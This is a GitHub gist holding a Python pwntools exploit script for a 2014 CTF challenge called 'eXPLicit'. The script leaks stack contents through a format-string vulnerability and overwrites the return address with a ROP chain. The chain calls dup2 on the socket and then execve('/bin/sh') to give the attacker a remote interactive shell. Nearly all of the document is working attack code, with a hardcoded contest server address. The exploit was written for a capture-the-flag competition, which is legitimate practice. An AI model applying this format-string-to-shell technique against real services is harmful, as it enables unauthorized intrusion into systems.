Last active
August 29, 2015 14:06
-
-
Save akiym/c00a0a277c04e6432d85 to your computer and use it in GitHub Desktop.
No cON Name CTF Quals 2014 - eXPLicit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import time | |
import re | |
from pwn import * | |
from libformatstr import * | |
REMOTE = 0 | |
if REMOTE: | |
host = '88.87.208.163' | |
port = 7070 | |
else: | |
host = '127.0.0.1' | |
port = 7070 | |
def connect(): | |
return remote(host, port) | |
def retrieve_val(res): | |
m = re.search('Your number is (.+) which is too low.', res) | |
if m: | |
leak = m.group(1) | |
return leak | |
else: | |
return None | |
def dump_stack(): | |
for i in range(1, 100): | |
payload = ( | |
"%%%d$x" % i + | |
'\n' | |
) | |
s.sendafter('Pick a number between 0 and 20: ', payload) | |
res = s.recvuntil('which is too low.') | |
leak = retrieve_val(res) | |
if leak: | |
print '%d: %s' % (i, leak) | |
else: | |
print buf | |
s.interactive() | |
def send_fmt(payload): | |
s.sendafter('Pick a number between 0 and 20: ', payload + '\n') | |
bss = 0x80d6080 + 0x100 | |
int80 = 0x8082715 # int 0x80; ret | |
popeax = 0x80a8ff6 # pop eax; ret | |
popecx_ebx = 0x8060a7d # pop ecx; pop ebx; ret | |
popedx_ecx_ebx = 0x8060a7c # pop edx; pop ecx; pop ebx; ret | |
s = connect() | |
#dump_stack() | |
send_fmt('%69$x') | |
buf = s.recvuntil('which is too low.') | |
retaddr = int(retrieve_val(buf), 16) - 76 # offset | |
log.info('retaddr = %x' % retaddr) | |
# dup2(4, 0) | |
p = FormatStr() | |
p[retaddr] = [popeax, 0x3f, popecx_ebx, 0, 0x4, int80] | |
send_fmt(p.payload(6)) | |
retaddr += 4*6 | |
# dup2(4, 1) | |
p = FormatStr() | |
p[retaddr] = [popeax, 0x3f, popecx_ebx, 1, 0x4, int80] | |
send_fmt(p.payload(6)) | |
retaddr += 4*6 | |
# execve("/bin/sh", ["/bin/sh", NULL], NULL) | |
p = FormatStr() | |
p[retaddr] = [popeax, 0x0b, popedx_ecx_ebx, 0, bss, bss+4*2, int80] | |
send_fmt(p.payload(6)) | |
# ["/bin/sh", NULL] | |
p = FormatStr() | |
p[bss] = [bss+4*2, 0, '/bin/sh'] | |
send_fmt(p.payload(6)) | |
s.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment